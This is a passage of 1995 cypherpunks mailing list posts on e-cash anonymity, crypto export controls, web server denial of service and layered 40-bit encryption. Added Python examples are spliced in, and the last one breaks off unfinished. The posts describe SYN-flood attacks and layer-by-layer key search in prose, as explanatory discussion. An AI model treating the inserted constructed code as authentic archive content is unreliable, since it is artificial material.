>SPA, ETC, ETC, ETC).

I did and here's a view from IT; i.e. not law or marketing.  The conference
was two-track so by definition I only attended 1/2 the sessions.

The high points ...

	- the Web will support commerce next year from modest (multi-$1,000)
          down to micro (sub-penny) transactions

	- the U.S. Government is trying to trade 64-bit keys for
          escrow but folks aren't buying it;  Dorothy Denning gave
          a very weak "the sky is falling" talk.

	- Intel is building systems and secure infrastructure software; 
          Microsoft may start to feel trapped between Intel and Netscape.

	- current copyright law seems up to the task of handling the Web but
          contract law may need some updating

	- iris scanning seems to be the leading biometric; there is a PCMCIA 
          card that does fingerprints including pores which I learned are 
          better than ridges for identification

	- nobody had any insight on transnational data flow, encrypted
          or otherwise

	- Verisign (a spin-off of RSA) is selling Digital IDs and running a 
          Certification Authority; see

                    http://www.verisign.com

        - the Swedes have a very aggressive Digital ID system on the air;
          see
                    http://www.cost.se

	- X.509 seems to be the de facto and de jure certificate standard;
          current work is at ftp://NC-17.MA02.Bull.com in
          /pub/OSIdirectory/Certificates

	- RSA for encryption and DSA for signatures were the encryption
          technologies of preference;  PGP was occasionally acknowledged 
          to be one of the best available but strangely went undiscussed.

          Good quote: "Commercial DES (for export) with 40 bit keys is a 
                       joke. Don't even think about it."

        - other relevant URLs:
                 www.ms.com
                 www.terisa.com
                 www.ssa.gov

Most of the security focus of the conference was on authentication.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "User A." <usura@utopia.hacktic.nl>
Date: Tue, 24 Oct 95 19:21:01 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510250220.DAA04439@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Dave sez:

: >Now all we need is to do is get some specs on how DigiCash's software works
: >so that we can code this.  I expect that this method will become quite
: >popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
: >bunch of forms, etc.  I suspect that most people would rather change money
: >in lesser amounts, probably under $50.  This opens up a huge market for
: >Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
: >a commission to exchange $50 worth of greenbacks for Digicash instead of
: >dealing with Mark Twain and shelling out $250 to start..

: Irrelevant point: To open an account as a consumer, not a merchant, and
: solely for DigiCash use, only $11 (!) is required.  Although I'll agree
: with the bunch of forms part.  Damn, I wish I understood legalese...

Hmm their webpage states clearly:

--begin quote--
How Does This All Work?

There are two essential components to this test of the Ecash system. Both are necessary 
to make this work.

   1.You must open a WorldCurrency Access(tm) account with Mark Twain Bank (USA).
     This is a traditional banking account where you can choose between 25 different
     currencies for your deposits. 
   2.You will obtain and install the Ecash software by DigiCash. This is subject to a 
     separate license agreement. In conjunction with your banking account from 
     Mark Twain Bank, you can now move money to your own hard drive from the Ecash Mint,
     for spending when you choose. 
--end quote--

Now, to open a WorldCurrency Access(tm) account you have to deposit $2500, if the account
balance falls below $250 you need to pay a $10 fee. I surely hope that someone could
shed some light on this. 

-AJ-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 25 Oct 95 00:25:33 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Froomkin papers (Was: BlackNet Meets Stanford Law School)
In-Reply-To: <acb2d750010210042399@[205.199.118.202]>
Message-ID: <199510250723.DAA31771@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> By the way, I gave a talk at Stanford Law School last week, to Professor
> Margaret Radin's seminar on "Cyberspace and the Law." They had been reading
> a bunch of papers and reprints on Clipper, PGP, and crypto policy,
> including pieces by both me and Michael Froomkin (whose long paper is
> apparently becoming widely read for crypto-legal discussions).

Incidentally, I finally sat down and read Michael Froomkin's paper on
anonymity, <a href="http://www.law.cornell.edu/jol/froomkin.htm">A. Michael 
Froomkin, Anonymity and Its Enmities, 1995 J. ONLINE L. art. 4.</a> a couple
of nights ago. As a layperson, I found it clear and worthwhile reading. He
argues convincingly (IMHO) that the upholding of rights to anonymous speech
by the U.S. Supreme Court, on Constitutional and other grounds, should not
be taken for granted. (In a footnote, I discovered the charming name of a
Freezing Cold War era U.S. Govt. body that I'm fortunately too young to 
remember: the Subversive Activities Control Board.)

Anyway, if you are interested in the legal status of anonymity rights in the
U.S., I highly recommend this paper. 

-Futplex <futplex@pseudonym.com>
[not affiliated w/ U of Miami, Michael Froomkin, his relatives, their pets,...]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Oct 95 02:30:01 PDT
To: cypherpunks@toad.com
Subject: Re: IT View of Worldwide Electronic Commerce Conference
Message-ID: <v02120d04acb3afd839d4@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:20 AM 10/25/95, guthery@austin.sar.slb.com wrote:
>I did and here's a view from IT; i.e. not law or marketing.  The conference
>was two-track so by definition I only attended 1/2 the sessions.

I *love* this place!

Thanks, very much.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 25 Oct 95 06:03:41 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510251303.GAA04029@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGyIMI.KM9@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

> tomw@orac.engr.sgi.com (Tom Weinstein) writes:
>> Perhaps the problem is that Bob insists that Alice's coin was not signed
>> by the bank.  In that case, how about this modification?  Alice should
>> first show Bob the doubly blinded coin she gave to the bank and the
>> signed doubly blinded coin she received back.  Bob can verify the
>> signature and then Alice can give him the blinding factor so he can
>> unblind it himself.  Bob also needs to sign the singly blinded coin that
>> he gives to Alice so that Alice can later show that she gave him the
>> correct blinding factor if Bob tries to claim that she didn't.

> The problem with this is that Bob and the bank can now collude to trace
> Alice, since he sees what she sent to the bank.  This is not as bad as in
> the forward traceability case of regular ecash, because it happens after
> Alice has completed her bank transaction, rather than before, but it
> would be better to be untraceable since that is the whole point of this
> variation.

Good point.  To guard against this, Alice needs to double blind what she
sends to the bank.  She can then remove one layer of blinding and show
the results to Bob.  Of course Bob and the bank can still collude because
of the timing of the transactions.  This seems to be a fundamental
weakness of this reverse e-cash scheme.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com
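
The layered blinding discussed in this exchange, as an added example that is not from the thread or from DigiCash's software. It assumes textbook RSA blind signatures and a toy bank key constructed here from two small Mersenne primes; every name in it is hypothetical.

```python
"""Layered RSA blinding: why an extra layer stops Bob and the bank matching records."""
import hashlib
import secrets
from math import gcd

# Toy bank key, constructed for this example and far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1            # two Mersenne primes
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # bank's private exponent (Python 3.8+)


def fresh_factor():
    """Random blinding factor r with 1 < r < N and gcd(r, N) == 1."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(value, r):
    """Add one blinding layer: value * r^E mod N."""
    return value * pow(r, E, N) % N


def unblind(sig, r):
    """Remove one layer from a signature: sig * r^-1 mod N."""
    return sig * pow(r, -1, N) % N


def bank_sign(value):
    """The bank signs whatever it is sent, without seeing what is underneath."""
    return pow(value, D, N)


def verifies(value, sig):
    """Check sig^E == value mod N using only the bank's public key."""
    return pow(sig, E, N) == value % N


def coin_from_serial(serial):
    """Map a coin serial number to an integer below N (constructed encoding)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def run_exchange(extra_layer):
    """Bob is the payee who creates the coin; Alice is the payer who has it signed."""
    coin = coin_from_serial(b"constructed-serial-0001")
    r_bob, r_alice = fresh_factor(), fresh_factor()

    c1 = blind(coin, r_bob)            # Bob -> Alice: singly blinded coin
    c2 = blind(c1, r_alice)            # Alice adds her layer: doubly blinded coin

    if extra_layer:
        # Alice blinds once more before the bank sees anything, then strips
        # that layer from the signature before showing Bob.
        r_extra = fresh_factor()
        to_bank = blind(c2, r_extra)
        s2 = unblind(bank_sign(to_bank), r_extra)
    else:
        # Alice shows Bob exactly what the bank saw.
        to_bank = c2
        s2 = bank_sign(to_bank)

    # Alice shows Bob (c2, s2); Bob checks the bank's signature first.
    bob_accepts = verifies(c2, s2)
    # Alice then reveals r_alice; Bob checks it against the c1 he issued.
    factor_ok = blind(c1, r_alice) == c2
    sig = unblind(unblind(s2, r_alice), r_bob)   # Bob removes both layers

    return {
        "bob_accepts": bob_accepts,
        "factor_ok": factor_ok,
        "coin_valid": verifies(coin, sig),
        # Can the bank's withdrawal record be matched with what Bob was shown?
        # Timing correlation is outside this model and still applies.
        "linkable": to_bank == c2,
    }


if __name__ == "__main__":
    for extra in (False, True):
        print("extra layer:", extra, run_exchange(extra))
```
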




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 03:52:48 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: Does your software?
In-Reply-To: <Pine.SOL.3.91.951024210756.18616A-100000@chivalry>
Message-ID: <9510251049.AA20105@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Tue, 24 Oct 1995, Jon Mittelhauser wrote:
> 
> > Dr. Frederick B. Cohen wrote:
> > 
> > > Yet it services more than one request per minute, 24 hours, 7 days, and
> > > has done so without denial of services, corruption, or leakage since its
> 
> > I really tried to resist but....
> > 
> 
> Thanks for saving me from the temptation but I guessed you were so taken 
> aback by the performance claims that you missed the most amazing claim: 
> an httpd that is proof against Denial Of Service. I'd love to know how 
> Dr. Fred does this, since DoS is believed impossible to defend against 
> for unauthenticated TCP...

It's detailed to some extent in the on-line paper about the server.

> The usual DoS attack is to send a stream of connection-initiating SYNs to 
> the target port, and never ACK the returned SYN. This fills up the listen 
> queue, and jams the port. As long as you can generate SYNs faster than 
> the TCP implementation times out the older pending requests, the port is 
> jammed (modulo a small window of, er, invulnerability between one of your 
> SYNs timing out and its replacement turning up).

Right - that's why you have to have timeouts.  Unfortunately, I only
prevent denial of services attacks once things hit the server.  I think
the TCP wrapper also has a timeout on its request for authentication. 
As I said, the system is not made less secure by the server.  It's very
common for other http servers to start a process, lose the link to the
calling host, and leave processes hung out to dry.  Even without an
intentional attack, servers end up with hundreds of processes hanging
around after a few weeks of uptime.  If you get 1024 hung channels, you
have denial of services on most http implementations.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 25 Oct 95 07:04:19 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <DGypKo.Isx@sgi.sgi.com>
Message-ID: <199510251404.HAA04065@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGypKo.Isx@sgi.sgi.com>, sameer <sameer@c2.org> writes:

>> I posted a list of MD5 checksums as a personal favor to various cypherpunks
>> who asked for them, since I have access to the original bits.  The official
>> Netscape solution for checking your downloaded distribution will be
>> announced later in the year.  In the mean time anyone who is uncomfortable
>> with downloading the bits from the net can always buy a copy.  We will
>> ship them the distribution on floppy.
>> 

> 	That's quite lame.. (not on your part jeff, obviously, because
> you posted the md5s) Netscape's responses in the past have been pretty
> quick, but this is damn slow. I am disappointed. 

This isn't an easy problem.  Personally, I'd rather have them get it
right than get it done fast.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 04:22:42 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Does your software?
In-Reply-To: <308D82CA.7AB2@netscape.com>
Message-ID: <9510251119.AA23193@all.net>
MIME-Version: 1.0
Content-Type: text


>   Is this the server running on port 80 of all.net?  I've tried connecting
> to it quite a few times at various times of day and night, using
> netscape and telnet, and all I ever get in response to 'GET /'
> is a closed connection.

Could it be that you are from IP address 198.95.250.69?

If so, your firewall (or other mechanism) is presenting an incomplete
falsehood about the mapping between your host name and your IP address.

Oct 24 21:19:15 all in.thttpd[20865]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
Oct 24 21:19:15 all in.thttpd[20865]: refused connect from 198.95.250.69
Oct 24 21:19:46 all in.thttpd[20919]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
Oct 24 21:19:46 all in.thttpd[20919]: refused connect from 198.95.250.69
Oct 24 21:19:58 all in.thttpd[20945]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
Oct 24 21:19:58 all in.thttpd[20945]: refused connect from 198.95.250.69

My server refuses connections from hosts when the IP address doesn't
match to the host name.  This is a common method for reducing the level
of address forgery on the Internet.  Please ask your firewall manager to
repair the firewall so we can authenticate you.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
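
The host name/address consistency check described in the message above, sketched as an added example (not code from that server or from the TCP wrapper). The resolver tables are constructed sample data, apart from the address and host name that appear in the quoted log lines, and all function names are hypothetical.

```python
"""Forward-confirmed reverse DNS: PTR lookup, forward lookup, then compare.

Agreement between the reverse and forward zones is evidence about the peer,
not proof of its identity, because plain DNS answers are unauthenticated.
"""
import ipaddress
import socket
from typing import List, NamedTuple, Optional


class Verdict(NamedTuple):
    allow: bool
    hostname: Optional[str]
    reason: str


def system_reverse(ip: str) -> Optional[str]:
    """PTR lookup through the system resolver; None when there is no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(name: str) -> List[str]:
    """Address lookup through the system resolver; empty list on failure."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(name, None)})
    except OSError:
        return []


def check_peer(ip, reverse=system_reverse, forward=system_forward) -> Verdict:
    """Accept a peer only if its PTR name resolves back to the same address."""
    peer = ipaddress.ip_address(ip)
    name = reverse(ip)
    if not name:
        return Verdict(False, None, "no reverse (PTR) record")
    forward_addrs = []
    for text in forward(name):
        try:
            forward_addrs.append(ipaddress.ip_address(text))
        except ValueError:
            continue                      # skip answers that are not plain addresses
    if not forward_addrs:
        return Verdict(False, name, "gethostbyname(%s) failed" % name)
    if peer not in forward_addrs:
        return Verdict(False, name, "host name/address mismatch")
    return Verdict(True, name, "ok")


# Constructed resolver data so the example runs offline. The first PTR entry
# reproduces the case in the quoted log; the others use documentation ranges.
PTR_TABLE = {
    "198.95.250.69": "unknown.netscape.com",   # name has no forward record
    "192.0.2.10": "www.example.org",           # consistent in both directions
    "192.0.2.66": "www.example.org",           # PTR claims a name it does not own
}
A_TABLE = {"www.example.org": ["192.0.2.10"]}


def demo():
    """Run the check over the constructed peers and return ip -> Verdict."""
    peers = ["198.95.250.69", "192.0.2.10", "192.0.2.66", "192.0.2.99"]
    return {
        ip: check_peer(ip, reverse=PTR_TABLE.get,
                       forward=lambda n: A_TABLE.get(n, []))
        for ip in peers
    }


if __name__ == "__main__":
    for ip, verdict in demo().items():
        state = "accepted" if verdict.allow else "refused"
        print("%s connect from %s: %s" % (state, ip, verdict.reason))
```
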



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 25 Oct 95 04:24:39 PDT
To: raph@CS.Berkeley.EDU>
Subject: Re: CJR returned to sender
In-Reply-To: <199510250513.WAA20962@kiwi.cs.berkeley.edu>
Message-ID: <m0t83yX-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:

:    I got the CJR back today, envelope unopened (although the corner was
: torn so you could see there were t-shirts inside). "Returned to sender",
: it said, "Refused___, Unclaimed___".
: 
:    The address on the envelope reads:
: 
: ATTN: Samuel L. Capino - 15 day CJR
: Defense Trade Analyst
: U.S. Dept. of State
: Office of Defense Trade Controls
: PM/DTC SA-6 Room 200
: 1701 N. Fort Meyer Drive
: Arlington, CA 22209-3113
: 
:    Did I do something wrong, or did the Dept. of State decide it
: didn't want to deal with this CJR?
: 
: Raph

I don't know, but I did speak with Mr. Capino on Monday, Oct. 23,
1995.  He said that they had downsized since he had taken over for
Major Oncale and that he was now responsible for all commodity
jurisdiction requests covering all items on the munitions list.  He
did not seem at all knowledgeable about cryptographic software.  

He did say, however, that he had heard that there was going to be (or
had been, I don't remember the exact words) a commodity jurisdiction
request on a T-shirt.  He obviously had not seen the request.  From his
mention of this matter I am quite sure that he had not deliberately
rejected the application.  He seems to be a pleasant person, and
sounded quite helpful, and I am sure that he wasn't being cute.  (On
the other hand the only helpful information that he could give me was
that there is now a NSA representative assigned to the Office of
Defense Trade Controls whose name is Karen Hopkinson and whose job is
to answer all questions relating to cryptography, but so far Ms. Hopkinson
has not responded to repeated phone calls.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Wed, 25 Oct 95 08:46:04 PDT
To: cypherpunks@toad.com
Subject: Mandatory ID in California?
Message-ID: <199510251545.IAA07597@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


From "The Daily Californian", Wed., 25 October, 1995, page 3:

<snip>
"Police were called to the scene by an officer who passed Burton
and smelled marijuana smoke, Phelps said.  The officer believed
it was coming from Burton's cigarette.

"The officer issued a citation to Burton for smoking marijuana
and requested to see identification.  Burton refused to show
identification and argued that smoking marijuana is legal in
Berkeley, Phelps said.

"The officer, in accordance with police policy, arrested Burton
for refusing to properly identify himself."
<snip>

That last sentence seemed ominous to me...

   - Ian



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 25 Oct 95 05:54:51 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: The real value of munition t-shirts (Re: CJR returned to sender)
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951025083704.15242B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Timothy C. May wrote:

> I won't belabor the point that the t-shirt is _at best_ comparable to a
> book, which generally needs no CJR (*), and _at worst_ is an illegible,
> confusing "work of art." (I personally am miffed at the imprecision of the
> "This shirt has been declared to be a munition"--or whatever, as I don't
> have one handy to check--and the language of the sales advertisements.)
  <snip>
> 
> No offense intended to all those who think a CJR for a t-shirt is a worthy
> cause, but I think it's a pointless diversion.
> 
  <snip>

I've found that the real value of my shirt is the fact that it's  
a valuable cypherpunk detector device for strangers who have come 
up to me and said, "Wow!  Is that the shirt I've heard so much about.. are 
you really a cypherpunk... hey there nice perl... " etc. etc. etc.  I've 
been approached about it at a Taco Bell, at the movies, and 
at a favorite coffee house of mine (several times, in fact).  One night I 
wore it to a dance club here in Baltimore, and no less than 6 people, all 
of whom I had never met before, approached me about it and wanted to talk 
about cypherpunk issues.  None of them were on the list.

Furthermore, it's an excellent conversation starter among friends and 
acquaintances who don't know anything about crypto or ITAR.  It's an easy
segue into a topic that really needs to be talked about, IMHO (and 
probably in your humble opinion, too).

To me, the price of the shirt is well worth the interesting discussions 
I've had with people I'd never talk to about crypto or at all otherwise.



kelli@zeus.towson.edu                         http://zeus.towson.edu/~kelli/
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
		"There's a word for people who have 
	     solved the riddle of the opposite sex:  gay."
					-Pateric J.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Oct 95 08:53:49 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb3ab3f06021004ee7e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:35 AM 10/25/95, Timothy C. May wrote:
>
>(* Hal Abelson of MIT says there are possible export problems with the MIT
>Press book on PGP, and MIT dropped plans for a version in a special OCR
>font. So, I agree that _some_ books cross the line and look like pure
>software. However, I continue to maintain that a badly-printed barcode is
>just a joke, nothing more.)

Brian LaMacchia sent me e-mail saying the MIT book _was_ published with the
OCR font as originally planned. No response to their CJR request, submitted
in Jan or Feb.

(I spoke to Hal Abelson at the CFP Conference in Feb, and that's when I got
the impression the OCR font had been dropped. Apparently not.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 25 Oct 95 06:19:25 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510251319.JAA86135@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sameer writes:

<snip>

>Unless the crypto export laws and the laws surrounding CJRs have a
>provision for 'jokes', then the return of Raph's properly formed CJR
>request seems to me rather, um, illegal?

This may open up some interesting Freedom Of Information Act
possibilities for Raph, (but IANAL). A FOIA request usually isn't
very fast, but they can be interesting, and even (occasionally)
funny. Raph's situation sounds promising, if my hypothetical FOIA
isn't squelched by the "national security" exception. This seems
unlikely, if Tim is correct about the shirt's machine-unreadability.

>	The law, in my opinion, is a joke. Does that mean I can ignore
>it?

Members of the legal community, including judges, are sometimes
known as "humor-impaired" regarding the many laws that clearly
*are* jokes to many people. Generally the "crimes" mentioned in
these laws have no individual victims -- see Abe Lincoln .sig
quote below.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

 "A prohibition law strikes a blow at the very principles upon which
  our government was founded" -- Abraham Lincoln 
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>     IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:53 PDT
To: perry@piermont.com (perry)
Subject: RE: Netscape Logic Bomb detailed by IETF
Message-ID: <1995Oct25.091400.1151.341059@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address books. Thanks.

ahg3

 ----------
From:  perry[SMTP:perry@piermont.com]
Sent:  Tuesday, October 24, 1995 6:00 PM
To:  cypherpunks
Subject:  Re: Netscape Logic Bomb detailed by IETF



anonymous-remailer@shell.portal.com writes:
> I see that Perry is as charming as ever?

And I see that you don't know what you are talking about.

> Perry, I just don't think that it is wise to stick your head in the sand
> and ignore a severe flaw in your algorithm, while actively misrepresenting
> matters to those people who are not intimately familiar with the IETF.

I wonder if you even know what the IETF is, since you seem to be
waving around an organization I work in like it was a mass of chicken
entrails.

> Postscript isn't like any other language around.  Operator names have no
> special significance to the interpreter.  You can't just "strip out"
> dangerous commands.  They aren't "reserved" in the sense that operator
> names are in other languages, like COBOL or BASIC.
>
> In Postscript, operator names are simply keys into a LIFO dictionary.

If, Mr. Anonymous, you can get a postscript interpreter to do I/O
after you have stripped all the system calls that do file I/O out of
the C code for the interpreter merely by invoking the names of the I/O
commands in the postscript books, you have managed a feat beyond mere
spoon bending and ought to be studied by the parapsychologists.

In any case, Netscape doesn't write the postscript interpreters and
doesn't have built in support for postscript and doesn't ship mailcap
files that deal with postscript, so I'd say you are a crank worth ignoring.

Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:17 PDT
To: cypherpunks@toad.com (cypherpunks)
Subject: RE: 80 bits from 40 bits -- NOT
Message-ID: <1995Oct25.093008.1151.341060@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  baldwin[SMTP:baldwin@RSA.COM]
Sent:  Tuesday, October 24, 1995 2:39 PM
To:  cypherpunks
Subject:  80 bits from 40 bits -- NOT


        Well, let me eat my words.  Unless all layers turn on
encryption at the same time, and there is not predictable text
that passes from one layer to the next, adding encryption at
each layer cannot substantially improve the size of the key
space.  Consider two layers each of which has a verifiable
header and a body of encrypted text.  By "verifiable", I mean
that it contains enough redundancy to recognize a correct
decryption of the cipher added by the lower layer.  For example,
a header that included a content type field and a length field
could be examined to see if it looked reasonable, and thus
confirm a guess at the lower level's cipher.


                Plaintext-Body-1
                      |
                 Layer-1-cipher
                      |
      Header-1, Encrypted-Body-1
               |
            Layer-2-cipher
                   |
   Header-2, Encrypted-Body-2

        To crack this system, an attacker does brute force search
of the keyspace for the layer-2-cipher, for each key check the
decrypted Header-1 value to see if it looks OK, if not, continue,
otherwise start searching the keyspace for the Layer-1-cipher
given the candidate for the Encrypted-Body-1 produced by the
guess at the Layer-2-cipher key.  Clearly, if you have several
layer 2 blocks and they all have good looking values for the
Header-1, then the Layer-2-cipher key is correct.

        The summary is that two layers of 40 bit ciphers with
the first layer adding some verifiable information, has the effect
of adding at most one bit to the effective keysize (doubling the
amount of work).  It DOES NOT increase the keysize to 80 bits.
                --Bob Baldwin


______________________________ Reply Separator _________________________________
Subject: 80 bit security from 40 bit exportable products
Author:  "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> at INTERNET
Date:    10/24/95 10:52 AM

        Long ago vendors should have put encryption into network layer
products, but for a variety of reasons that effort was delayed or
discouraged.  One effect of this lack is that almost every layer of
the network stack is adding its own encryption.  For example, the
HTTP session layer added S-HTTP and the TCP transport layer added
SSL.  Soon we will have network layer encryption with IPsec.
        The vendors for each layer can export a product that uses
ciphers with 40 bit keys.  A user can then combine multiple
products to get more than 40 bits worth of security.  For example,
a web client might fetch an S-HTTP page over an SSL protected link
via a firewall that supports IPsec tunnels.  That's three 40 bit
keys protecting the data over the internet link (of course, this
may not be equivalent to a 120 bit cipher, that depends on the
details of the cipher systems and independence of the key setups).
Interesting possibilities.
                --Bob Baldwin
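
The search described in the "80 bits from 40 bits -- NOT" message above, as an added example that is not part of the original posts. The 8-bit toy keys, the SHA-256 keystream cipher, the header layout (4-byte content type plus 2-byte length) and the sample message are all assumptions made so the cost of the two cases can be counted on a laptop.

```python
import hashlib
import struct

KEY_BITS = 8                 # toy key size standing in for 40 bits (assumption, keeps the run short)
KEYSPACE = 1 << KEY_BITS
HDR_LEN = 6                  # 4-byte content type + 2-byte body length

def layer_cipher(layer: int, key: int, data: bytes) -> bytes:
    """Toy stream cipher (not from the post): XOR with SHA-256(layer, key, block).
    Encryption and decryption are the same operation."""
    out = bytearray()
    for i in range(0, len(data), 32):
        pad = hashlib.sha256(struct.pack(">BIQ", layer, key, i // 32)).digest()
        out.extend(b ^ p for b, p in zip(data[i:i + 32], pad))
    return bytes(out)

def add_header(ctype: bytes, body: bytes) -> bytes:
    return ctype + struct.pack(">H", len(body)) + body

def header_ok(blob: bytes, ctype: bytes) -> bool:
    """The 'verifiable' test: content type and length field look reasonable."""
    if len(blob) < HDR_LEN or blob[:4] != ctype:
        return False
    return struct.unpack(">H", blob[4:6])[0] == len(blob) - HDR_LEN

def looks_like_text(body: bytes) -> bool:
    return bool(body) and all(32 <= b < 127 for b in body)

def wrap(k1: int, k2: int, plaintext: bytes, header1: bool = True) -> bytes:
    """Plaintext-Body-1 -> Layer-1-cipher -> [Header-1] -> Layer-2-cipher -> Header-2."""
    inner = layer_cipher(1, k1, plaintext)
    if header1:
        inner = add_header(b"TXT1", inner)
    return add_header(b"LYR2", layer_cipher(2, k2, inner))

def search_layer_by_layer(packet: bytes):
    """Search k2 alone, using Header-1 to confirm it, then search k1 alone."""
    trials = 0
    for k2 in range(KEYSPACE):
        trials += 1
        layer1 = layer_cipher(2, k2, packet[HDR_LEN:])
        if not header_ok(layer1, b"TXT1"):
            continue
        for k1 in range(KEYSPACE):
            trials += 1
            body = layer_cipher(1, k1, layer1[HDR_LEN:])
            if looks_like_text(body):
                return k1, k2, body, trials
    return None

def search_key_pairs(packet: bytes):
    """With nothing recognizable between the layers, only (k1, k2) pairs can be tested."""
    trials = 0
    for k2 in range(KEYSPACE):
        inner = layer_cipher(2, k2, packet[HDR_LEN:])
        for k1 in range(KEYSPACE):
            trials += 1
            body = layer_cipher(1, k1, inner)
            if looks_like_text(body):
                return k1, k2, body, trials
    return None

# Constructed sample values.
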